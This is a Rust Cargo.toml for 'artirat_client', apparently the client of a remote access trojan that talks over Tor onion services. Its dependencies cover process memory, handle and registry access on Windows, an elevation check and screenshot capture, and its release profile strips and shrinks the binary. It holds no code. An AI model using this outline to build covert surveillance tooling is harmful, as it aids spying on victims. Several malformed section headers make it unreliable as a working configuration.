[package]
name = "artirat_client"
version = "0.2.0"
edition = "2024"

[target.'cfg(windows)'.dependencies]
winapi = {version = "0.3.9", features=[
    "memoryapi",
    "libloaderapi",
    "winuser", 
    "processthreadsapi", 
    "psapi", 
    "handleapi", 
    "minwindef",
    "fileapi",
    "ioapiset",
    "memoryapi",
    "wow64apiset",
    "minwindef",
    "ntdef"
] }
windows = { version = "0.62.2", features = [
    "Win32_System_SystemServices",
    "Win32_System_WindowsProgramming"
] }
winres = "0.1.11"
win32-error = "0.9.0"
winreg = "0.56.0"
is_elevated = "0.1.2"
image = "0.25.10"
screenshots = "0.8.10"

[dependencies]
arti-client = { version = "0.41", features = ["onion-service-client","rustls","static-sqlite"] }
gethostname = "1.1.0"
tor-rtcompat = { version = "0.41", features = ["tokio"] }
tokio = { version = "1", features = ["full"] }
anyhow = "1"
rand = { version = "0.8.0", features = ["std", "std_rng"] }
rusqlite = { version = "0", features = ["bundled"] }
zstd = { version = "0.13", features = ["zstdmt"] }
openssl = { version = "0", features = ["vendored"] }
base64 = "0.22"
uuid = { version = "1.11.1", features = ["v4"] }
libc = { version = "0.2.186", features = ["align", "extra_traits", "use_std"] }
['!cfg!(android)'.dependencies]
image = "0.25.10"
screenshots = "0.8.10"
[target.'cfg(linux)'.dependencies]
image = "0.25.10"
screenshots = "0.8.10"
[target.'cfg(macos)'.dependencies]
image = "0.25.10"
screenshots = "0.8.10"



[profile.release]
opt-level = "z"
debug = 0
lto = true
codegen-units = 1
strip = true
panic = "abort"

['!cfg(!musl)'.lib]
crate-type = ["cdylib"] 

['cfg(!musl)'.lib]
crate-type = ["staticlib"] 

